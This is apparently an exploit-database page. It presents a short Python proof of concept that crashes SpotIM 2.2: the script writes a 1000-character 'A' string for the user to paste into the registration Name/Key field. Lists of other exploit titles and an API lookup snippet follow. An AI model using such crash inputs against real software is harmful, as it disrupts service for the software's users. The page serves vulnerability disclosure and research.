Menu

"SpotIM 2.2 - Denial of Service (PoC)"

Author

"Alejandra Sánchez"

Platform

windows

Release date

2019-05-10

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
# -*- coding: utf-8 -*-
# Exploit Title: SpotIM 2.2 - 'Name/Key' Denial of Service (PoC)
# Date: 09/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.nsauditor.com
# Software Link http://www.nsauditor.com/downloads/spotim_setup.exe
# Version: 2.2
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script "SpotIM.py", it will create a new file "SpotIM.txt"
# 2.- Copy the text from the generated SpotIM.txt file to clipboard
# 3.- Open SpotIM
# 4.  Select "Register" > "Enter Registration Code..."
# 5.- Paste clipboard in the Name/Key field 
# 6.- Click 'OK'
# 7.- Crashed

buffer = "\x41" * 1000
f = open ("SpotIM.txt", "w")
f.write(buffer)
f.close()
Release Date Title Type Platform Author
2019-08-15 "Microsoft Windows Text Services Framework MSCTF - Multiple Vulnerabilities" local windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Double Free due to Malformed JP2 Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - free() of Uninitialized Pointer due to Malformed JBIG2Globals Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed JP2 Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Memory Corruption due to Malformed TTF Font" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow in CoolType.dll" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed Font Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Static Buffer Overflow due to Malformed Font Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow While Processing Malformed PDF" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Use-After-Free due to Malformed JP2 Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Out-of-Bounds read due to Malformed JP2 Stream" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap-Based Out-of-Bounds read in FixSbitSubTableFormat1" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap Corruption in MakeFormat12MergedGlyphList" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap-Based Out-of-Bounds read in WriteTableFromStructure" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap Corruption in ReadAllocFormat12CharGlyphMapList" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap Corruption in ReadTableIntoStructure" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap Corruption in FixSbitSubTables" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Double Free in MergeFormat12Cmap / MakeFormat12MergedGlyphList" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap-Based Out-of-Bounds read in GetGlyphIdx" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Returning a Dangling Pointer via MergeFontPackage" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat CoolType (AFDKO) - Call from Uninitialized Memory due to Empty FDArray in Type 1 Fonts" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat CoolType (AFDKO) - Memory Corruption in the Handling of Type 1 Font load/store Operators" dos windows "Google Security Research"
2019-08-14 "ManageEngine opManager 12.3.150 - Authenticated Code Execution" webapps windows kindredsec
2019-08-14 "TortoiseSVN 1.12.1 - Remote Code Execution" webapps windows Vulnerability-Lab
2019-08-14 "Microsoft Windows 10 AppXSvc Deployment Service - Arbitrary File Deletion" local windows "Abdelhamid Naceri"
2019-08-12 "Steam Windows Client - Local Privilege Escalation" local windows AbsoZed
2019-08-14 "Windows PowerShell - Unsanitized Filename Command Execution" dos windows hyp3rlinx
2019-08-05 "Apache Tika 1.15 - 1.17 - Header Command Injection (Metasploit)" remote windows Metasploit
2019-07-26 "Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation" local windows ShivamTrivedi
2019-07-18 "Microsoft Windows 10 1903/1809 - RPCSS Activation Kernel Security Callback Privilege Escalation" local windows "Google Security Research"
Release Date Title Type Platform Author
2019-05-27 "Pidgin 2.13.0 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-23 "Terminal Services Manager 3.2.1 - Denial of Service" dos windows "Alejandra Sánchez"
2019-05-23 "NetAware 1.20 - 'Share Name' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-23 "NetAware 1.20 - 'Add Block' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-22 "BlueStacks 4.80.0.1060 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-20 "docPrint Pro 8.0 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-20 "PCL Converter 2.7 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-20 "Encrypt PDF 2.3 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-15 "Tomabo MP4 Converter 3.25.22 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-17 "CEWE Photo Importer 6.4.3 - '.jpg' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-17 "CEWE Photoshow 6.4.3 - 'Password' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-17 "Sandboxie 5.30 - 'Programs Alerts' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-14 "TwistedBrush Pro Studio 24.06 - '.srp' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-14 "TwistedBrush Pro Studio 24.06 - 'Script Recorder' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-14 "TwistedBrush Pro Studio 24.06 - 'Resize Image' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-14 "Selfie Studio 2.17 - 'Resize Image' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-10 "SpotPaltalk 1.1.5 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-10 "SpotIM 2.2 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-09 "Convert Video jetAudio 8.1.7 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-09 "Lyric Maker 2.0.1.0 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-09 "Lyric Video Creator 2.1 - '.mp3' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-04-16 "PCHelpWare V2 1.0.0.5 - 'Group' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-04-16 "PCHelpWare V2 1.0.0.5 - 'SC' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-04-04 "Magic ISO Maker 5.5(build 281) - 'Serial Code' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-02-28 "TransMac 12.3 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-02-21 "Memu Play 6.0.7 - Privilege Escalation" local windows "Alejandra Sánchez"
2019-02-21 "Valentina Studio 9.0.5 Linux - 'Host' Buffer Overflow (PoC)" dos linux "Alejandra Sánchez"
2019-02-18 "NBMonitor 1.6.5.0 - 'Key' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-02-18 "Realterm Serial Terminal 2.0.0.70 - Local Buffer Overflow (SEH)" dos windows "Alejandra Sánchez"
2019-02-18 "Realterm Serial Terminal 2.0.0.70 - Denial of Service" dos windows "Alejandra Sánchez"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46821/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46821/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46821/41252/spotim-22-denial-of-service-poc/download/", "exploit_id": "46821", "exploit_description": "\"SpotIM 2.2 - Denial of Service (PoC)\"", "exploit_date": "2019-05-10", "exploit_author": "\"Alejandra S\u00e1nchez\"", "exploit_type": "dos", "exploit_platform": "windows", "exploit_port": null}
                                            

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Browse exploit APIBrowse